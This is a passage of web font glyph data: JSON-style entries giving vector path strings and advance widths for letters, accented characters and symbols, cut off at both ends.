9,-21,21,-21xm55,-261v12,0,21,9,21,21v0,12,-9,22,-21,22v-12,0,-21,-11,-21,-22v1,-11,9,-21,21,-21","w":174},{"d":"105,54r-93,0r0,-16r62,0r0,-289r-62,0r0,-16r93,0r0,321","w":135},{"d":"17,-186v-1,-38,30,-63,68,-63r91,0r0,13r-20,0r0,274r-18,0r0,-274r-28,0r0,274r-18,0r0,-162v-43,1,-75,-21,-75,-62","w":180},{"d":"57,66v-15,17,-58,17,-58,-9v0,-34,40,-16,45,2v13,-7,33,-44,38,-60r-58,-142v-4,-10,-16,-17,-27,-19r0,-11r79,0r0,12v-10,0,-26,3,-18,15r42,103v12,-36,31,-63,41,-106v-1,-6,-16,-12,-23,-13r0,-11r64,0v4,20,-23,14,-26,31r-62,147v-12,26,-22,44,-37,61xm133,-261v12,0,20,10,21,21v0,11,-9,22,-21,22v-12,0,-21,-10,-21,-22v0,-12,9,-21,21,-21xm57,-261v12,0,21,9,21,21v0,12,-9,22,-21,22v-12,0,-21,-11,-21,-22v1,-11,9,-21,21,-21","w":177},{"d":"124,-165v31,12,60,32,60,77v0,55,-38,101,-98,88r0,-14v48,11,62,-30,61,-75v0,-37,-16,-70,-54,-68v1,-6,-4,-18,6,-15v28,0,40,-19,41,-46v0,-23,-11,-41,-32,-41v-33,0,-41,34,-40,73r0,186r-58,0r0,-12v15,1,25,-3,25,-18v0,-101,-30,-242,75,-242v38,0,61,18,61,53v0,32,-21,48,-47,54","w":197},{"d":"98,-178v50,-1,86,38,84,90v-2,55,-31,93,-87,93v-53,0,-82,-37,-83,-91v-1,-52,35,-92,86,-92xm98,-8v63,0,67,-157,0,-157v-38,0,-48,36,-49,76v0,43,10,81,49,81xm136,-261v12,0,20,10,21,21v0,11,-9,22,-21,22v-12,0,-21,-10,-21,-22v0,-12,9,-21,21,-21xm60,-261v12,0,21,9,21,21v0,12,-9,22,-21,22v-12,0,-21,-11,-21,-22v1,-11,9,-21,21,-21","w":194},{"d":"71,-32v0,15,12,20,26,20r0,12r-84,0r0,-12v15,1,25,-3,25,-18r0,-107v1,-18,-14,-21,-30,-23r0,-12v20,1,46,-6,63,-1r0,141xm98,-202r-8,5r-43,-48r-42,48r-9,-5r41,-67v8,-5,24,-1,26,6","w":105},{"d":"168,-289v0,21,-17,37,-37,38r88,224v5,9,18,14,31,15r0,12r-104,0r0,-12v15,-3,36,-1,30,-18r-20,-56r-88,0v-7,20,-15,36,-17,58v1,11,22,16,36,16r0,12r-94,0r0,-12v20,-4,34,-13,41,-31r81,-207v-21,-2,-38,-16,-38,-39v-1,-23,22,-39,46,-39v25,0,45,15,45,39xm149,-102r-38,-97r-37,97r75,0xm123,-261v16,0,23,-12,23,-28v0,-16,-7,-28,-23,-28v-16,-1,-25,12,-24,28v0,16,8,28,24,28","w":241},{"d":"37,78v-36,-12,-6,-66,-6,-102r0,-149r33,0r0,119v-5,49,61,44,72,13r0,-132r33,0r0,137v-1,18,11,22,30,21r0,12v-27,12,-58,5,-64,-21v-13,25,-66,40,-90,13v-6,31,30,82,-8,89","w":203},{"d":"220,-217v20,20,35,53,34,93v-2,77,-44,127,-120,130v-33,1,-58,-11,-76,-28r-31,37r-11,-9r32,-38v-20,-21,-34,-53,-34,-92v0,-78,45,-132,120,-132v32,0,57,13,76,29r27,-32r11,9xm134,-240v-82,-1,-90,116,-66,185r125,-152v-12,-19,-30,-33,-59,-33xm134,-9v81,-1,90,-115,66,-185r-125,151v11,19,30,34,59,34","w":267},{"d":"169,-261v84,0,156,71,156,155v0,84,-72,155,-156,155v-84,0,-155,-72,-155,-155v0,-83,71,-155,155,-155xm169,34v75,0,139,-67,139,-140v0,-73,-65,-140,-139,-140v-73,0,-138,67,-138,140v0,73,64,140,138,140xm180,-36v29,0,41,-16,52,-39r10,4v-12,27,-30,51,-69,51v-55,0,-85,-31,-87,-84v-2,-67,70,-107,130,-77v4,-5,6,-13,18,-11r1,64r-9,0v-8,-27,-20,-51,-55,-51v-33,1,-48,34,-48,73v0,39,22,70,57,70","w":339},{"d":"175,-28r-8,7r-67,-63v-7,-7,1,-20,5,-23r62,-58r8,7r-45,65xm108,-28r-8,7r-67,-63v-7,-8,0,-19,5,-23r62,-58r8,7r-45,65","w":209},{"d":"148,-77v0,27,-12,70,29,63r0,11v-24,13,-57,7,-62,-19v-20,35,-101,38,-101,-17v0,-55,68,-51,101,-72v1,-30,-3,-54,-33,-54v-9,0,-21,4,-25,8v5,16,6,39,-17,39v-12,0,-17,-10,-18,-20v5,-26,32,-38,62,-40v61,-5,64,39,64,101xm49,-43v-1,39,53,31,65,8r1,-61v-30,11,-64,15,-66,53xm125,-261v12,0,20,10,21,21v0,11,-9,22,-21,22v-12,0,-21,-10,-21,-22v0,-12,9,-21,21,-21xm49,-261v12,0,21,9,21,21v0,12,-9,22,-21,22v-12,0,-21,-11,-21,-22v1,-11,9,-21,21,-21","w":181},{"d":"75,-255v33,0,58,25,58,57v0,32,-26,57,-58,57v-32,0,-57,-25,-57,-57v0,-32,25,-57,57,-57xm76,-154v19,-1,31,-19,31,-43v1,-25,-10,-45,-32,-45v-42,1,-41,89,1,88","w":150},{"d":"94,-109v1,38,-20,59,-41,78r152,0r0,31r-184,0r0,-26v30,-11,37,-44,38,-83r-29,0r0,-17r29,0v-13,-68,13,-131,77,-130v36,1,61,18,63,52v0,12,-5,22,-18,22v-28,1,-23,-26,-17,-45v-21,-31,-73,-10,-72,37r2,64r70,0r0,17r-70,0","w":223},{"d":"148,-77v0,27,-12,70,29,63r0,11v-24,13,-57,7,-62,-19v-20,35,-101,38,-101,-17v0,-55,68,-51,101,-72v1,-30,-3,-54,-33,-54v-9,0,-21,4,-25,8v5,16,6,39,-17,39v-12,0,-17,-10,-18,-20v5,-26,32,-38,62,-40v61,-5,64,39,64,101xm49,-43v-1,39,53,31,65,8r1,-61v-30,11,-64,15,-66,53xm93,-255v7,-25,50,-12,33,9v-16,20,-42,34,-62,51r-7,-6","w":181},{"d":"71,-32v0,15,12,20,26,20r0,12r-84,0r0,-12v15,1,25,-3,25,-18r0,-107v1,-18,-14,-21,-30,-23r0,-12v20,1,46,-6,63,-1r0,141xm10,-246v-9,-15,9,-32,24,-21v19,22,26,38,46,66r-7,6","w":105},{"d":"155,-202r-8,5r-49,-48r-48,48r-9,-5v16,-22,30,-47,48,-67v7,-4,22,-2,24,5xm98,-178v50,-1,86,38,84,90v-2,55,-31,93,-87,93v-53,0,-82,-37,-83,-91v-1,-52,35,-92,86,-92xm98,-8v63,0,67,-157,0,-157v-38,0,-48,36,-49,76v0,43,10,81,49,81","w":194},{"d":"117,65v29,7,42,-28,11,-28v-4,0,-7,-1,-10,-1r0,-31v-66,-8,-100,-54,-104,-127v-5,-102,96,-164,180,-115v4,-7,8,-15,22,-12r1,89r-14,0v-10,-37,-23,-80,-68,-80v-58,0,-79,53,-79,115v0,61,25,111,84,111v40,0,61,-25,73,-55r14,6v-18,42,-44,66,-96,69r0,11v40,-7,56,42,20,55v-13,5,-30,7,-49,6r0,-13r15,0"},{"d":"172,-35v0,15,10,21,26,20r0,12v-19,-1,-45,8,-59,1v-1,-7,2,-17,-1,-22v-13,15,-27,28,-57,28v-63,0,-48,-81,-48,-141v0,-17,-12,-21,-27,-23r0,-11v20,0,44,-6,61,-2r0,120v-6,51,60,43,72,13r0,-99v0,-18,-15,-21,-33,-21r0,-11v21,0,48,-6,66,-2r0,138xm106,-255v7,-25,50,-12,33,9v-16,20,-42,34,-62,51r-7,-6","w":207},{"w":86},{"d":"172,-35v0,15,10,21,26,20r0,12v-19,-1,-45,8,-59,1v-1,-7,2,-17,-1,-22v-13,15,-27,28,-57,28v-63,0,-48,-81,-48,-141v0,-17,-12,-21,-27,-23r0,-11v20,0,44,-6,61,-2r0,120v-6,51,60,43,72,13r0,-99v0,-18,-15,-21,-33,-21r0,-11v21,0,48,-6,66,-2r0,138xm65,-246v-9,-15,9,-32,24,-21v19,22,26,38,46,66r-7,6","w":207},{"d":"66,-53v-9,13,-35,41,0,42r0,11r-64,0r0,-11v40,-14,45,-40,73,-74v-18,-24,-33,-51,-53,-73v-4,-3,-10,-4,-17,-4r0,-11r75,0r0,11v-10,0,-22,2,-12,12r29,45v10,-16,25,-28,32,-48v0,-6,-12,-7,-18,-9r0,-11r64,0r0,11v-39,8,-48,42,-70,66v20,26,34,57,58,79v4,3,10,5,17,5r0,12r-80,0r0,-12v30,1,13,-20,2,-35r-19,-28v-6,8,-12,15,-17,22","w":181},{"d":"107,-240v-36,-14,-73,29,-38,52v32,21,90,27,90,77v0,27,-21,47,-44,55v64,25,33,106,-35,101v-28,-2,-49,-6,-52,-30v0,-11,6,-19,17,-18v17,1,21,20,27,33v26,8,53,-8,53,-30v0,-53,-110,-39,-104,-105v2,-27,20,-43,43,-53v-21,-11,-36,-20,-36,-46v0,-38,33,-52,70,-52v27,0,53,6,53,31v0,10,-6,18,-18,17v-17,-2,-20,-18,-26,-32xm102,-61v28,-11,40,-47,16,-70v-9,-8,-23,-15,-40,-21v-29,7,-41,48,-17,69v9,8,23,15,41,22","w":180},{"d":"169,-261v84,0,156,71,156,155v0,84,-72,155,-156,155v-84,0,-155,-72,-155,-155v0,-83,71,-155,155,-155xm169,34v75,0,139,-67,139,-140v0,-73,-65,-140,-139,-140v-73,0,-138,67,-138,140v0,73,64,140,138,140xm236,-150v0,29,-17,39,-42,46v25,23,34,63,77,68r0,11r-50,0v-21,-31,-33,-46,-55,-72r-18,0v3,26,-12,66,25,61r0,11r-77,0v-6,-20,24,-5,24,-25r0,-113v1,-13,-14,-13,-24,-16r0,-10v56,4,140,-17,140,39xm148,-110v55,16,79,-67,20,-66r-20,0r0,66","w":339},{"d":"172,-35v0,15,10,21,26,20r0,12v-19,-1,-45,8,-59,1v-1,-7,2,-17,-1,-22v-13,15,-27,28,-57,28v-63,0,-48,-81,-48,-141v0,-17,-12,-21,-27,-23r0,-11v20,0,44,-6,61,-2r0,120v-6,51,60,43,72,13r0,-99v0,-18,-15,-21,-33,-21r0,-11v21,0,48,-6,66,-2r0,138xm139,-261v12,0,20,10,21,21v0,11,-9,22,-21,22v-12,0,-21,-10,-21,-22v0,-12,9,-21,21,-21xm63,-261v12,0,21,9,21,21v0,12,-9,22,-21,22v-12,0,-21,-11,-21,-22v1,-11,9,-21,21,-21","w":207},{"d":"172,-303v18,0,22,-11,27,-24r11,4v-6,21,-19,42,-45,43v-24,1,-33,-15,-54,-18v-22,-3,-16,33,-35,20v8,-19,18,-42,43,-43v24,-1,33,18,53,18xm49,-194v1,-28,-22,-40,-45,-43r0,-12r71,0r141,190v-4,-55,11,-131,-11,-168v-5,-3,-25,-9,-33,-10r0,-12r101,0r0,12v-16,3,-38,4,-38,25v0,66,-1,144,-2,214r-16,0r-151,-204r0,129v1,32,1,53,28,57v8,2,14,4,17,4r0,12r-103,0r0,-12v15,-4,38,-6,39,-24v5,-44,1,-109,2,-158","w":276},{"d":"144,-124v10,13,9,38,0,51r33,33r-15,15r-34,-32v-13,9,-37,9,-50,0r-34,33r-15,-16r33,-33v-10,-12,-10,-39,0,-51r-33,-33r16,-15r33,33v11,-10,39,-10,50,-1r33,-32r16,15xm103,-69v15,0,28,-14,28,-29v0,-15,-13,-29,-28,-29v-16,0,-29,14,-29,29v0,15,14,29,29,29","w":205},{"d":"148,-77v0,27,-12,70,29,63r0,11v-24,13,-57,7,-62,-19v-20,35,-101,38,-101,-17v0,-55,68,-51,101,-72v1,-30,-3,-54,-33,-54v-9,0,-21,4,-25,8v5,16,6,39,-17,39v-12,0,-17,-10,-18,-20v5,-26,32,-38,62,-40v61,-5,64,39,64,101xm49,-43v-1,39,53,31,65,8r1,-61v-30,11,-64,15,-66,53xm52,-246v-9,-15,9,-32,24,-21v19,22,26,38,46,66r-7,6","w":181},{"d":"56,-174v13,0,24,11,24,24v0,13,-11,24,-24,24v-13,0,-24,-11,-24,-24v0,-13,11,-24,24,-24xm56,-44v13,0,24,11,24,24v0,13,-11,24,-24,24v-13,0,-24,-11,-24,-24v0,-13,11,-24,24,-24","w":112},{"d":"79,75r-23,0r0,-343r23,0r0,343","w":135},{"d":"91,-255v41,0,70,32,69,73v-1,42,-28,75,-71,75v-40,0,-69,-33,-69,-74v0,-42,29,-74,71,-74xm90,-120v52,-1,51,-120,1,-122v-54,0,-51,120,-1,122","w":180},{"d":"65,-155v45,-52,124,-5,124,68v0,71,-78,118,-136,76v-7,8,-9,25,-24,18r2,-238v1,-19,-16,-26,-34,-26r0,-11r64,-4v8,32,-4,85,4,117xm104,-8v62,0,69,-151,-3,-151v-18,1,-28,8,-38,18r0,101v6,17,18,32,41,32","w":201},{"d":"121,-123v1,-38,-70,-62,-77,-17v7,53,96,21,98,90v2,54,-78,69,-111,39r-3,12r-13,0r-2,-61r12,0v8,25,23,48,55,51v41,3,46,-53,9,-59v-32,-12,-70,-17,-72,-59v-2,-45,61,-64,97,-42v1,-7,6,-11,16,-9r3,55r-12,0","w":155},{"d":"71,-32v0,15,12,20,26,20r0,12r-84,0r0,-12v15,1,25,-3,25,-18r0,-107v1,-18,-14,-21,-30,-23r0,-12v20,1,46,-6,63,-1r0,141xm79,-261v12,0,20,9,20,21v0,13,-8,23,-20,22v-12,0,-20,-10,-20,-22v0,-11,9,-21,20,-21xm18,-261v11,0,20,10,20,21v0,12,-8,22,-20,22v-12,0,-20,-9,-20,-22v0,-12,8,-21,20,-21","w":105},{"d":"76,-34v50,0,101,1,100,52v-1,47,-41,58,-90,60v-44,1,-77,-9,-79,-45v-1,-28,28,-35,50,-42v-15,-5,-31,-10,-30,-31v1,-17,11,-24,26,-30r0,-3v-19,-9,-35,-23,-35,-49v-1,-45,53,-67,97,-51r60,0r0,17v-13,1,-30,-2,-41,1v34,42,-6,103,-70,89v-22,8,-12,32,12,32xm82,-78v22,0,32,-20,32,-43v0,-24,-10,-45,-32,-45v-23,0,-30,19,-30,44v0,23,10,44,30,44xm92,65v31,1,55,-11,55,-40v0,-36,-45,-23,-74,-28v-22,4,-35,13,-35,35v0,25,25,32,54,33","w":183},{"d":"191,-211v6,-23,-18,-25,-36,-26r0,-12r92,0r0,12v-20,2,-32,13,-38,30r-84,210r-15,0r-80,-216v-5,-15,-19,-23,-37,-24r0,-12r104,0r0,12v-16,1,-37,0,-30,18r63,167","w":239},{"d":"75,-317v12,-23,51,-3,32,15v-16,15,-48,24,-72,37r-6,-7xm14,-12v14,-3,37,0,37,-21r0,-181v1,-19,-21,-20,-37,-23r0,-12r112,0r0,12v-18,1,-37,2,-37,22r0,180v-1,20,20,21,37,23r0,12r-112,0r0,-12","w":140},{"d":"105,-15v26,0,37,-12,49,-33r13,7v-14,25,-37,46,-72,46v-55,0,-82,-37,-82,-93v0,-51,28,-90,79,-90v51,0,72,33,70,86r-114,0v0,44,14,77,57,77xm128,-107v-1,-29,-6,-58,-36,-58v-29,1,-43,26,-44,58r80,0xm52,-246v-9,-15,9,-32,24,-21v19,22,26,38,46,66r-7,6","w":174},{"d":"158,-202r-9,5r-49,-48r-48,48r-8,-5v16,-22,29,-47,47,-67v7,-4,23,-2,25,5xm172,-35v0,15,10,21,26,20r0,12v-19,-1,-45,8,-59,1v-1,-7,2,-17,-1,-22v-13,15,-27,28,-57,28v-63,0,-48,-81,-48,-141v0,-17,-12,-21,-27,-23r0,-11v20,0,44,-6,61,-2r0,120v-6,51,60,43,72,13r0,-99v0,-18,-15,-21,-33,-21r0,-11v21,0,48,-6,66,-2r0,138","w":207},{"d":"105,-15v26,0,37,-12,49,-33r13,7v-14,25,-37,46,-72,46v-55,0,-82,-37,-82,-93v0,-51,28,-90,79,-90v51,0,72,33,70,86r-114,0v0,44,14,77,57,77xm128,-107v-1,-29,-6,-58,-36,-58v-29,1,-43,26,-44,58r80,0xm98,-255v7,-25,50,-12,33,9v-16,20,-42,34,-62,51r-7,-6","w":174},{"d":"101,-36v-1,20,23,22,41,24r0,12r-118,0r0,-12v17,-3,43,1,43,-22r0,-123r-44,0r0,-15v29,3,54,-9,65,-22r15,0","w":154},{"d":"173,-326v11,0,21,10,21,22v0,12,-10,22,-21,22v-25,0,-26,-44,0,-44xm94,-326v11,0,21,10,21,22v0,12,-10,22,-21,22v-25,0,-26,-44,0,-44xm134,-255v77,0,120,52,120,131v0,77,-44,130,-120,130v-76,0,-120,-52,-120,-130v0,-78,44,-131,120,-131xm134,-10v59,0,77,-52,77,-114v0,-63,-18,-116,-77,-116v-60,0,-77,54,-77,116v0,62,17,114,77,114","w":267},{"d":"162,-324v25,0,26,44,0,44v-11,0,-21,-10,-21,-22v0,-12,10,-22,21,-22xm83,-324v25,0,26,44,0,44v-11,0,-21,-10,-21,-22v0,-12,10,-22,21,-22xm51,-28v1,11,22,16,36,16r0,12r-94,0r0,-12v20,-4,34,-13,41,-31r82,-210r14,0r89,226v5,9,18,14,31,15r0,12r-104,0r0,-12v15,-3,36,-1,30,-18r-20,-56r-88,0v-7,20,-15,36,-17,58xm149,-102r-38,-97r-37,97r75,0","w":241},{"d":"128,-261v12,0,20,10,21,21v0,11,-9,22,-21,22v-12,0,-21,-10,-21,-22v0,-12,9,-21,21,-21xm52,-261v12,0,21,9,21,21v0,12,-9,22,-21,22v-12,0,-21,-11,-21,-22v1,-11,9,-21,21,-21","w":180},{"d":"14,-12v14,-3,37,0,37,-21r0,-181v1,-19,-21,-20,-37,-23r0,-12r112,0r0,12v-18,1,-37,2,-37,22r0,180v-1,20,20,21,37,23r0,12r-112,0r0,-12xm108,-325v12,0,20,10,21,21v0,11,-9,22,-21,22v-12,0,-21,-10,-21,-22v0,-12,9,-21,21,-21xm32,-325v12,0,21,9,21,21v0,12,-9,22,-21,22v-12,0,-21,-11,-21,-22v1,-11,9,-21,21,-21","w":140},{"d":"130,-236v63,50,76,241,-36,241v-53,0,-78,-37,-82,-90v-6,-73,88,-117,129,-64v-3,-30,-17,-57,-30,-77r-41,25r-9,-14r40,-23v-8,-11,-19,-18,-29,-26r9,-10v12,7,28,17,37,26r36,-21r9,14xm95,-8v64,0,64,-151,1,-151v-37,0,-46,33,-47,71v0,45,10,80,46,80","w":191},{"d":"127,-249v78,4,129,44,129,126v0,81,-56,123,-136,123r-103,0r0,-12v17,0,35,-3,34,-21r0,-90r-33,0r0,-17r33,0r0,-73v2,-19,-17,-22,-33,-24r0,-12r109,0xm126,-14v63,-4,87,-44,87,-109v0,-75,-42,-121,-125,-111r0,94r53,0r0,17r-53,0v4,45,-19,113,38,109","w":269},{"d":"191,-271r-8,6r-49,-37r-49,37r-8,-6r47,-55v8,-4,23,-2,26,5xm134,-255v77,0,120,52,120,131v0,77,-44,130,-120,130v-76,0,-120,-52,-120,-130v0,-78,44,-131,120,-131xm134,-10v59,0,77,-52,77,-114v0,-63,-18,-116,-77,-116v-60,0,-77,54,-77,116v0,62,17,114,77,114","w":267},{"d":"137,-317v11,-23,50,-2,32,15v-16,15,-49,24,-73,37r-5,-7xm51,-28v1,11,22,16,36,16r0,12r-94,0r0,-12v20,-4,34,-13,41,-31r82,-210r14,0r89,226v5,9,18,14,31,15r0,12r-104,0r0,-12v15,-3,36,-1,30,-18r-20,-56r-88,0v-7,20,-15,36,-17,58xm149,-102r-38,-97r-37,97r75,0","w":241},{"d":"88,-199v64,-5,121,9,121,66v0,63,-52,80,-121,76r0,23v-2,20,19,20,36,22r0,12r-107,0r0,-12v16,-2,34,-3,34,-22r0,-180v1,-19,-19,-21,-34,-23r0,-12r105,0r0,12v-23,0,-40,8,-34,38xm88,-72v47,3,77,-11,77,-55v0,-46,-27,-62,-77,-57r0,112","w":221},{"d":"180,-271r-8,6r-49,-37r-48,37r-9,-6r47,-55v8,-3,24,-2,26,5xm51,-28v1,11,22,16,36,16r0,12r-94,0r0,-12v20,-4,34,-13,41,-31r82,-210r14,0r89,226v5,9,18,14,31,15r0,12r-104,0r0,-12v15,-3,36,-1,30,-18r-20,-56r-88,0v-7,20,-15,36,-17,58xm149,-102r-38,-97r-37,97r75,0","w":241},{"d":"175,-135v0,72,-88,65,-126,104r135,0r0,31r-165,0v-1,-80,117,-48,117,-137v0,-46,-58,-55,-79,-26v7,19,9,47,-17,46v-13,0,-19,-10,-19,-23v0,-35,36,-52,76,-54v43,-1,78,20,78,59","w":201},{"d":"204,-13r-23,0r0,-80r-156,0r0,-22r179,0r0,102"},{"d":"175,41v39,0,66,-10,88,-29r6,9v-23,20,-54,36,-96,34v-85,-3,-143,-50,-143,-139v0,-94,62,-157,158,-157v74,0,115,43,118,115v1,52,-34,102,-83,102v-22,0,-34,-13,-39,-29v-9,15,-21,27,-41,28v-28,-1,-42,-18,-40,-48v3,-49,32,-91,82,-95v16,-2,23,11,28,22r7,-20r26,0v-11,39,-29,72,-36,114v-2,11,6,17,16,17v41,-1,66,-45,64,-93v-3,-62,-38,-98,-103,-98v-80,0,-129,56,-129,139v0,78,38,128,117,128xm133,-70v0,53,46,27,55,-1r20,-59v-3,-16,-8,-27,-24,-28v-37,6,-51,49,-51,88","w":334},{"d":"131,-14v54,9,72,-26,83,-59r13,0r-5,73r-207,0r0,-12v17,-1,36,-3,36,-22r0,-179v2,-20,-20,-22,-36,-24r0,-12r193,0r0,60r-13,0v-7,-26,-28,-53,-68,-47r-39,0r0,100v42,4,69,-4,69,-41r13,0r0,97r-13,0v-1,-36,-26,-47,-69,-42v4,48,-19,120,43,108","w":235},{"d":"79,-127r-23,0r0,-141r23,0r0,141xm79,75r-23,0r0,-143r23,0r0,143","w":135},{"d":"110,-174v24,4,44,15,45,42v3,59,-122,72,-133,17v-2,-10,6,-18,15,-18v20,-1,21,16,15,31v24,18,69,8,69,-31v0,-29,-23,-34,-55,-31r0,-17v31,2,47,-5,47,-35v0,-28,-39,-35,-53,-16v6,14,3,31,-16,31v-10,0,-15,-7,-15,-16v0,-50,117,-53,118,1v0,26,-20,32,-37,42","w":180},{"d":"86,-255v7,-25,50,-12,33,9v-16,20,-42,34,-62,51r-7,-6","w":180},{"d":"13,-89v-4,-74,84,-112,137,-71v8,-8,9,-27,25,-21v-5,71,-2,149,-3,225v0,18,15,21,31,22r0,12r-94,0r0,-12v16,-1,31,-2,30,-19v-1,-21,2,-45,-1,-64v-13,11,-25,23,-49,22v-50,-3,-73,-40,-76,-94xm49,-85v0,58,55,93,90,53r0,-104v-7,-15,-19,-29,-41,-29v-33,0,-49,39,-49,80","w":201},{"d":"127,-271r-8,6r-49,-37r-49,37r-8,-6r47,-55v8,-4,23,-2,26,5xm14,-12v14,-3,37,0,37,-21r0,-181v1,-19,-21,-20,-37,-23r0,-12r112,0r0,12v-18,1,-37,2,-37,22r0,180v-1,20,20,21,37,23r0,12r-112,0r0,-12","w":140},{"d":"150,-207v-3,63,-70,62,-101,96r109,0r0,25r-132,0v-2,-67,88,-51,91,-122v2,-33,-41,-45,-59,-23v5,16,7,34,-15,34v-12,0,-16,-7,-16,-17v4,-55,126,-56,123,7","w":180},{"d":"206,-87r-79,0r0,79r-22,0r0,-79r-80,0r0,-22r80,0r0,-80r22,0r0,80r79,0r0,22"},{"d":"135,-238v19,1,21,-12,28,-24r10,4v-5,39,-55,56,-87,28v-19,-10,-32,7,-37,21r-10,-5v8,-19,18,-41,44,-42v26,-1,31,17,52,18xm179,-31v0,15,11,18,25,19r0,12r-85,0r0,-12v16,1,28,-3,27,-18v-3,-48,16,-127,-30,-127v-22,0,-37,12,-45,26r0,100v-1,16,13,18,27,19r0,12r-85,0r0,-12v15,1,26,-3,25,-18r0,-107v0,-16,-11,-23,-27,-23r0,-12v19,0,44,-6,60,-1v1,7,-2,18,1,24v14,-15,29,-28,58,-29v67,-2,49,85,49,147","w":212},{"d":"247,-14v54,9,69,-28,82,-59r12,0r-5,73r-205,0r0,-12v16,-2,36,-3,36,-22r0,-72r-85,0v-13,24,-27,44,-37,76v2,13,14,16,30,18r0,12r-92,0r0,-12v21,-2,35,-15,44,-31r108,-190v-6,-2,-21,-5,-30,-4r0,-12r217,0r0,60r-13,0v-7,-26,-27,-53,-67,-47r-38,0r0,100v41,4,67,-5,67,-41r14,0r0,97r-14,0v0,-37,-25,-46,-67,-42v4,48,-19,120,43,108xm167,-121r0,-113r-14,0r-62,113r76,0","w":349},{"d":"98,-178v50,-1,86,38,84,90v-2,55,-31,93,-87,93v-53,0,-82,-37,-83,-91v-1,-52,35,-92,86,-92xm98,-8v63,0,67,-157,0,-157v-38,0,-48,36,-49,76v0,43,10,81,49,81xm68,-246v-9,-15,9,-32,24,-21v19,22,26,38,46,66r-7,6","w":194},{"d":"56,-203v7,78,132,44,132,132v0,70,-96,96,-147,58v-4,8,-8,16,-22,13r-2,-85r14,0v12,39,28,75,75,75v30,0,49,-13,47,-44v-4,-80,-129,-42,-129,-133v0,-67,88,-84,131,-50v3,-8,7,-15,21,-12r1,82r-14,0v-11,-35,-21,-72,-66,-73v-21,0,-43,16,-41,37","w":201},{"d":"12,-269v107,5,126,193,75,278v-18,28,-43,45,-75,49r0,-15v55,-13,68,-72,69,-147v1,-78,-15,-137,-69,-151r0,-14","w":135},{"d":"14,-12v14,-3,37,0,37,-21r0,-181v1,-19,-21,-20,-37,-23r0,-12r112,0r0,12v-18,1,-37,2,-37,22r0,180v-1,20,20,21,37,23r0,12r-112,0r0,-12","w":140},{"d":"116,-192v13,0,23,10,23,22v0,12,-11,23,-23,23v-12,0,-23,-11,-23,-23v0,-12,10,-22,23,-22xm206,-87r-181,0r0,-22r181,0r0,22xm116,-50v12,0,23,11,23,23v0,12,-10,22,-23,22v-13,0,-23,-10,-23,-22v0,-12,11,-23,23,-23"},{"d":"18,-12v14,-2,33,-3,33,-21r0,-180v1,-19,-18,-22,-33,-24r0,-12r103,0r0,12v-15,2,-33,2,-33,22r0,86r4,0v30,-29,71,-58,85,-99v-3,-7,-15,-9,-26,-9r0,-12r94,0v5,22,-31,10,-41,27r-77,82r81,99v13,15,26,27,51,29r0,12r-70,0v-28,-42,-62,-85,-96,-122r-5,0r0,87v-1,18,17,21,33,23r0,12r-103,0r0,-12","w":249},{"d":"104,-236v-46,-5,-63,28,-77,57r-12,0r7,-70r187,0r0,6r-157,229v36,-3,90,6,113,-9v15,-10,30,-38,36,-55r12,0r-8,78r-200,0r0,-6r157,-230r-58,0","w":216},{"d":"93,-236v-50,-7,-67,22,-78,54r-12,0r0,-67r217,0r0,67r-12,0v-11,-32,-28,-61,-78,-54r0,200v-1,20,23,21,40,24r0,12r-118,0r0,-12v16,-3,41,-1,41,-23r0,-201","w":222},{"d":"205,0r-179,0r0,-22r79,0r0,-71r-79,0r0,-22r79,0r0,-79r22,0r0,79r78,0r0,22r-78,0r0,71r78,0r0,22"},{"d":"114,-178v50,3,72,38,74,91v3,71,-67,111,-125,80r0,52v0,18,18,21,35,21r0,12r-97,0r0,-12v17,0,30,-3,30,-19r0,-278v1,-19,-16,-26,-34,-26r0,-11r64,-4v7,34,-2,83,3,119v10,-12,29,-26,50,-25xm104,-8v67,0,65,-150,-3,-151v-18,0,-29,11,-38,20r0,102v6,16,19,29,41,29","w":201},{"d":"349,-37r-27,0r0,41r-30,0r0,-41r-87,0r0,-22r96,-110r21,0r0,113r27,0r0,19xm292,-56r0,-80r-69,80r69,0xm254,-249r-130,249r-23,0r129,-249r24,0xm89,-114v-1,16,20,14,34,15r0,13r-100,0r0,-13v17,0,36,3,36,-14r0,-111r-36,0r0,-13v23,2,44,-6,54,-17r13,0","w":377},{"d":"17,-12v14,-2,34,-2,34,-21r0,-180v0,-18,-18,-22,-34,-24r0,-12r104,0r0,12v-15,2,-33,2,-33,22r0,77r117,0r0,-75v2,-19,-18,-22,-33,-24r0,-12r103,0r0,12v-15,2,-32,3,-32,22r0,180v-1,18,16,21,32,23r0,12r-103,0r0,-12v13,-2,33,-1,33,-21r0,-89r-117,0r0,87v-1,18,17,21,33,23r0,12r-104,0r0,-12","w":293},{"d":"365,-37r-28,0r0,41r-29,0r0,-41r-87,0r0,-22r96,-110r20,0r0,113r28,0r0,19xm308,-56r0,-80r-69,80r69,0xm281,-249r-130,249r-24,0r130,-249r24,0xm108,-174v24,4,44,15,45,42v3,59,-122,72,-133,17v-2,-10,6,-18,15,-18v20,-1,21,16,15,31v24,18,69,8,69,-31v0,-29,-23,-34,-55,-31r0,-17v31,2,47,-5,47,-35v0,-28,-39,-35,-53,-16v6,14,3,31,-16,31v-10,0,-15,-7,-15,-16v0,-50,117,-53,118,1v0,26,-20,32,-37,42","w":377},{"d":"133,-317v12,-23,51,-3,32,15v-16,15,-49,24,-73,37r-5,-7xm177,-224v-2,-13,-20,-11,-33,-13r0,-12r87,0r0,12v-36,5,-47,39,-63,64v-23,37,-40,68,-40,136v0,21,23,22,40,25r0,12r-117,0r0,-12v16,-2,42,-1,40,-23v-2,-33,4,-66,-12,-87v-29,-38,-32,-103,-87,-115r0,-12r107,0r0,12v-21,1,-40,1,-29,19r51,93v16,-28,47,-71,56,-99","w":221},{"d":"172,-224v-2,-12,-17,-11,-30,-13r0,-12r83,0v2,24,-30,12,-37,37v-26,38,-39,62,-60,99r0,15r69,0r0,16r-69,0r0,46v-2,20,20,20,35,24r0,12r-107,0r0,-12v16,-2,36,-2,36,-23r0,-47r-70,0r0,-16r70,0v-1,-30,-21,-46,-26,-62v-22,-27,-25,-71,-68,-77r0,-12r102,0r0,12v-19,2,-36,-1,-27,17r48,87v14,-25,43,-67,51,-91","w":221},{"d":"70,-303v-13,-12,6,-34,22,-23v21,14,38,37,57,54r-6,7v-24,-13,-54,-21,-73,-38xm131,-14v54,9,72,-26,83,-59r13,0r-5,73r-207,0r0,-12v17,-1,36,-3,36,-22r0,-179v2,-20,-20,-22,-36,-24r0,-12r193,0r0,60r-13,0v-7,-26,-28,-53,-68,-47r-39,0r0,100v42,4,69